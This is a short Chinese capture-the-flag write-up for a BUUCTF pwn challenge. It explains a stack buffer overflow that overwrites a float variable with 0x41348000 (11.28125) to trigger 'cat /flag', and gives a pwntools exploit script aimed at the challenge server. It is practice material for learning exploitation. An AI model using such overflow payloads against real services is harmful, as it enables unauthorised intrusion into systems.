地址覆盖
当v2为11.28125时执行cat /flag,所以我们令v1覆盖v2的地址使其为11.28125
溢出距离为0x30-0x4
11.28125的十六进制为0x41348000
exp:
from pwn import *
host = 'node4.buuoj.cn'
port = 26014
p= connect (host,port)
#p= process('./pwn1')
payload= b'a'*(0x30-0x4)+p64(0x41348000)
p.send(payload)
p.interactive()